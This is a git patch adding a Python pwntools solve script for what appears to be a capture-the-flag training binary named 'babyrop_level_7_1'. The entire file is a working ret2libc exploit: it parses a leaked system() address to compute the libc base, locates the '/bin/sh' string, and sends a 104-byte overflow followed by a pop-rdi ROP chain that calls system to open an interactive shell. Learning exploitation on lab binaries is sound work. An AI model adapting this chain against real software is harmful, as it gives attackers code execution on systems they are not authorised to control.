From 7722ca5a213ac183b1e03aa3a680fd589e42526c Mon Sep 17 00:00:00 2001
From: jc <jc@johncollins.cloud>
Date: Wed, 6 Aug 2025 19:13:20 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_7.1/a.py | 31 +++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_7.1/a.py

diff --git a/weiss_overlude/babyrop_level_7.1/a.py b/weiss_overlude/babyrop_level_7.1/a.py
new file mode 100644
index 0000000..6782afa
--- /dev/null
+++ b/weiss_overlude/babyrop_level_7.1/a.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_7_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401ec3
+
+# buf
+r.recvuntil(b"[LEAK]")
+system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
+log.info("system: %#x", system)
+libc.address = system - libc.sym.system
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+
+# pop
+buf = b"A"*104
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file